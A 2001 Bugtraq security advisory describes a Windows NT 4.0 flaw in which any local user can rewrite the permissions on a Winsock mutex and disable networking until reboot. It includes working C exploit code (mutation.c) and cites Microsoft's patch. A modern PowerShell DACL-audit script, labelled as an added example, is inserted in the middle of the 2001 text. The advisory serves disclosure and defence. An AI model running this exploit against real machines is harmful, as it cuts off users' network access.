
ntsecurity.nu advisory: Winsock Mutex Vulnerability in Windows NT

daemon@ATHENA.MIT.EDU (Arne Vidstrom)
Mon Jan 29 02:09:29 2001

Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id:  <NLECJAEFKPPNCLPPMHLPMEKGCEAA.arne.vidstrom@ntsecurity.nu>
Date:         Fri, 26 Jan 2001 19:23:59 +0100
Reply-To: Arne Vidstrom <arne.vidstrom@NTSECURITY.NU>
From: Arne Vidstrom <arne.vidstrom@NTSECURITY.NU>
To: BUGTRAQ@SECURITYFOCUS.COM

-- Winsock Mutex Vulnerability in Windows NT 4.0 SP6 and below --

Author:

Arne Vidstrom (arne.vidstrom@ntsecurity.nu) - http://ntsecurity.nu


Severity:

Denial Of Service if the attacker is able to execute the exploit code under
any account on the system. Remote exploitation is not possible.


Details:

There is a mutex called Winsock2ProtocolCatalogMutex in Windows NT 4.0, to
which the Everyone group has Full Control. Any user can change this to No
Access, and that disables all network connectivity through Winsock until the
system is rebooted.
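The following script is an added example and is not part of the advisory or of Microsoft's patch. It audits the DACL of a named mutex from the defender's side: it opens the object with READ_CONTROL only, lists every access rule, and flags Allow entries that give a broad principal WRITE_DAC or WRITE_OWNER, which is exactly the condition (Everyone with Full Control) that let any local user lock the object. It assumes Windows PowerShell 5.1 on .NET Framework, where the Mutex.OpenExisting(name, MutexRights) overload exists, and English group names; the mutex name defaults to the one in the advisory.

```powershell
# Audit-MutexDacl.ps1 - added example, not from the advisory.
# Reports whether broad principals can rewrite the DACL of a named mutex.
# Assumes Windows PowerShell 5.1 (.NET Framework) and English principal names.
param(
    [string]$MutexName = 'Winsock2ProtocolCatalogMutex'
)

# Principals that should never hold WRITE_DAC / WRITE_OWNER on a system-wide object.
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

$ChangePermissions = [int][System.Security.AccessControl.MutexRights]::ChangePermissions  # WRITE_DAC
$TakeOwnership     = [int][System.Security.AccessControl.MutexRights]::TakeOwnership      # WRITE_OWNER

try {
    # Open with ReadPermissions (READ_CONTROL) only; no synchronize/modify rights are requested.
    $mutex = [System.Threading.Mutex]::OpenExisting(
        $MutexName,
        [System.Security.AccessControl.MutexRights]::ReadPermissions)
} catch [System.Threading.WaitHandleCannotBeOpenedException] {
    Write-Warning "Mutex '$MutexName' does not exist here (the name is the NT 4.0 one; later versions differ)."
    return
} catch [System.UnauthorizedAccessException] {
    # A Deny-Everyone DACL, as produced by the attack in the advisory, blocks even READ_CONTROL.
    Write-Warning "Access denied reading the DACL of '$MutexName'; the DACL may already have been replaced."
    return
}

$security = $mutex.GetAccessControl()
$rules = $security.GetAccessRules($true, $true, [System.Security.Principal.NTAccount])

$findings = foreach ($rule in $rules) {
    $rights = [int]$rule.MutexRights
    $risky = ($rule.AccessControlType -eq 'Allow') -and
             ($BroadPrincipals -contains $rule.IdentityReference.Value) -and
             ((($rights -band $ChangePermissions) -ne 0) -or (($rights -band $TakeOwnership) -ne 0))
    [pscustomobject]@{
        Principal = $rule.IdentityReference.Value
        Type      = $rule.AccessControlType
        Rights    = $rule.MutexRights
        Risky     = $risky
    }
}
$mutex.Close()

$findings | Format-Table -AutoSize
if ($findings | Where-Object Risky) {
    Write-Warning "A broad principal can rewrite the DACL of '$MutexName'; any local user could lock it (see MS01-003)."
} else {
    Write-Output "No broad principal holds WRITE_DAC or WRITE_OWNER on '$MutexName'."
}
```

Run it as an ordinary user after applying the patch: a healthy object shows no Risky entries, an unpatched NT 4.0 system shows Everyone with FullControl flagged, and an access-denied result while the network is down is itself a sign that the DACL has already been replaced.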


Vendor Response:

Microsoft has released a patch and you can read more about it in their
Security Bulletin at
http://www.microsoft.com/technet/security/bulletin/ms01-003.asp.


Sample exploit code:

/*
/* mutation.c - (c) 2000, Arne Vidstrom, arne.vidstrom@ntsecurity.nu
/*                        http://ntsecurity.nu
/*
/* - Disables all network connectivity through Winsock
/* - Can be run from any account (e.g. an ordinary User account)
/*
*/

#include <windows.h>
#include <aclapi.h>
#include <stdlib.h>     /* malloc, free */

int main(void)
{
        PSID pEveryoneSID;
        SID_IDENTIFIER_AUTHORITY iWorld = SECURITY_WORLD_SID_AUTHORITY;
        PACL pDacl;
        DWORD sizeNeeded;

        /* Build the well-known SID for the Everyone group (S-1-1-0) */
        AllocateAndInitializeSid(&iWorld, 1, SECURITY_WORLD_RID,
                                 0, 0, 0, 0, 0, 0, 0, &pEveryoneSID);

        /* ACL header plus one access-denied ACE carrying that SID */
        sizeNeeded = sizeof(ACL) + sizeof(ACCESS_DENIED_ACE) +
                     GetLengthSid(pEveryoneSID) - sizeof(DWORD);
        pDacl = (PACL) malloc(sizeNeeded);
        InitializeAcl(pDacl, sizeNeeded, ACL_REVISION);
        AddAccessDeniedAce(pDacl, ACL_REVISION, GENERIC_ALL, pEveryoneSID);

        /* Replace the mutex DACL; this succeeds only because Everyone
           holds Full Control (and so WRITE_DAC) on the object */
        SetNamedSecurityInfo("Winsock2ProtocolCatalogMutex",
                             SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                             NULL, NULL, pDacl, NULL);

        free(pDacl);
        FreeSid(pEveryoneSID);
        return 0;
}
